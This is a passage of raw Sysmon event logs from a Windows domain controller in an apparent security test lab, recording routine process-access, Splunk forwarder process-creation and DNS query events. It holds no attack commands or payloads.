Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001918Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.315{733EE690-3E0C-5F80-4F00-000000007F01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{733EE690-3E0C-5F80-4E00-000000007F01}3776C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-log 10341000x80000000000000001917Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.307{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0C-5F80-4E00-000000007F01}3776C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001916Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.307{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001915Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.307{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001914Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.307{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001913Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.307{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001912Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.307{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001911Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.307{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001910Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.307{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001909Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.307{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001908Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.307{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001907Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.307{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E0C-5F80-4E00-000000007F01}3776C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001906Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.307{733EE690-3E0B-5F80-4B00-000000007F01}38523848C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{733EE690-3E0C-5F80-4E00-000000007F01}3776C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1815e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001905Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.311{733EE690-3E0C-5F80-4E00-000000007F01}3776C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{733EE690-3E0B-5F80-4B00-000000007F01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001904Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.260{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E0C-5F80-4D00-000000007F01}3980C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001903Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.260{733EE690-3E0C-5F80-4D00-000000007F01}39803976C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 22542200x80000000000000001902Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.568{733EE690-3DF7-5F80-0B00-000000007F01}868win-dc-7216619010.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000001901Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.567{733EE690-3E09-5F80-2F00-000000007F01}2464win-dc-7216619.attackrange.local0fe80::f993:88b1:f5c9:43f4;::ffff:10.0.1.14;C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe 22542200x80000000000000001900Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.140{733EE690-3E09-5F80-2D00-000000007F01}2896win-dc-7216619010.0.1.14;C:\Program Files (x86)\nxlog\nxlog.exe 10341000x80000000000000001899Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.026{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0C-5F80-4D00-000000007F01}3980C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001898Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001897Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001896Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001895Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001894Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001893Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001892Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001891Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001890Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 